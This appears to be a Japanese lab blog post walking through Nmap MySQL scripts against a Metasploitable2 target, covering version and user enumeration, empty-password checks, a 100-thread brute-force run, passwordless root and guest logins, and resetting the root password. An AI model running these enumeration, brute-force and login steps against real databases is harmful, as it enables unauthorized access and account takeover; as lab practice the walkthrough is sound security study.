shikata ga nai

Private? There is no such things.

Nmapでmysqlのスクリプトをやってみた

Hello there, ('ω')ノ

 

まずは、mysqlのスクリプトの列挙を。

 ls -al /usr/share/nmap/scripts/ | grep -e "mysql"

 

f:id:ThisIsOne:20201217134156p:plain

 

今回もターゲットは、Metasploitable2で。

バージョンやソルトの情報を。

 nmap -p 3306 --script mysql-info 10.4.128.81

 

f:id:ThisIsOne:20201217134731p:plain

 

次にユーザの列挙を。

 nmap -p 3306 --script mysql-enum 10.4.128.81

 

f:id:ThisIsOne:20201217135223p:plain

 

パスワードなしをチェックすると。

rootのパスワードは、空らしく。

 nmap -p 3306 --script mysql-emty-password 10.4.128.81

 

f:id:ThisIsOne:20201217135644p:plain

 

さっそく、rootでログインいしょうとするとアクセスできなくて。

 

f:id:ThisIsOne:20201217140253p:plain

 

なので再度、スレッドを増やしてみると。

rootのほかにguestも。

 nmap -T4 -p 3306 --script mysql-brute --script-args mysql-brute.threads=100 10.4.128.81

 

f:id:ThisIsOne:20201217144607p:plain

 

nmapの様子をWiresharkで確認すると。

rootのレスポンスがOKで。

 

f:id:ThisIsOne:20201217145211p:plain

 

guestのレスポンスもOKで。

 

f:id:ThisIsOne:20201217145131p:plain


CLIからだとrootもguestもパスワードなしでログイン可能で。

 mysql -u root -h 10.4.128.81

 mysql -u guest -h 10.4.128.81

 

f:id:ThisIsOne:20201217150946p:plain

 

とりあえず、guestでログインして。

 

f:id:ThisIsOne:20201217151200p:plain

 

rootのパスワードを123に設定すると。

 

f:id:ThisIsOne:20201217151514p:plain

 

無事にrootでログインできた。

 

f:id:ThisIsOne:20201217151620p:plain

 

パスワードが暗号化されて保存されていた。

 

f:id:ThisIsOne:20201217153624p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain